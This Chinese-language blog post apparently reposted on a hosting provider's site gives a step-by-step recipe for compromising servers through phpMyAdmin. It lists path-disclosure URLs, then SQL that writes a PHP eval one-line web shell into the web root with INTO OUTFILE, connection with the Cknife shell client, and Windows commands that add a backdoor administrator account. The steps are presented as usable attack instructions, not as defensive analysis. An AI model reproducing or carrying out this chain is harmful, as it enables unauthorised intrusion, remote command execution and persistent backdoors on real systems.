您好,登錄后才能下訂單哦!
這篇文章主要介紹了如何利用phpMyAdmin提權,具有一定借鑒價值,感興趣的朋友可以參考下,希望大家閱讀完這篇文章之后大有收獲,下面讓小編帶著大家一起了解一下。
利用phpMyAdmin提權
爆路徑
/phpmyadmin/libraries/lect_lang.lib.php
/phpMyAdmin/index.php?lang[]=1
/phpMyAdmin/phpinfo.php
/load_file()
/phpmyadmin/themes/darkblue_orange/layout.inc.php
/phpmyadmin/libraries/select_lang.lib.php
/phpmyadmin/libraries/lect_lang.lib.php
/phpmyadmin/libraries/mcrypt.lib.php
得到物理路徑 C:\wamp\www\phpmyadmin\themes\darkblue_orange\layout.inc.php
寫馬
Create TABLE a (cmd text NOT NULL); Insert INTO a (cmd) VALUES("<?php eval($_POST[Cknife]);?>"); select cmd from a into outfile "C:/wamp/www/phpmyadmin/d.php"; Drop TABLE IF EXISTS a;
獲得webshell
最后用Cknife連接,創建帳戶并添加到管理員用戶組net user admin admin /add
net localgroup administrator admin /add
感謝你能夠認真閱讀完這篇文章,希望小編分享的“如何利用phpMyAdmin提權”這篇文章對大家有幫助,同時也希望大家多多支持億速云,關注億速云行業資訊頻道,更多相關知識等著你來學習!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。